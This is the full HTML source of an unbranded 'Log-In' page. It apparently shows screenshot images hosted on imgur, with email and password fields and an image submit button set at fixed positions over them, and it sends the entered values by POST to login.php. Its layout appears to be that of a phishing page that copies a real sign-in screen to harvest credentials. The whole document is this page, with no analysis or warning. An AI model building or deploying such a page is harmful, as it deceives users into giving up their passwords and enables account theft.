<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Log-In </title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1347px; height:657px; z-index:0"><img src="https://i.imgur.com/oU6LV1r.jpg" alt="" title="" border=0 width=1347 height=657></div>

<div id="image2" style="position:absolute; overflow:hidden; left:1px; top:552px; width:1348px; height:561px; z-index:1"><img src="https://i.imgur.com/W2SHLCG.jpg" alt="" title="" border=0 width=1348 height=561></div>

<div id="image3" style="position:absolute; overflow:hidden; left:841px; top:291px; width:332px; height:330px; z-index:2"><img src="https://i.imgur.com/XpvZfBu.jpg" alt="" title="" border=0 width=332 height=330></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:291px;left:864px;top:294px;z-index:4;height: 51px;" required placeholder="Email Address">
<input name="formtext2" type="password" style="position:absolute;width:291px;left:864px;top:385px;z-index:5;height: 51px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:857px; top:465px; z-index:6"><input type="image" name="formimage1" width="307" height="58" src="https://i.imgur.com/sIqJ6He.jpg"></div>
</form>


</body>
</html>
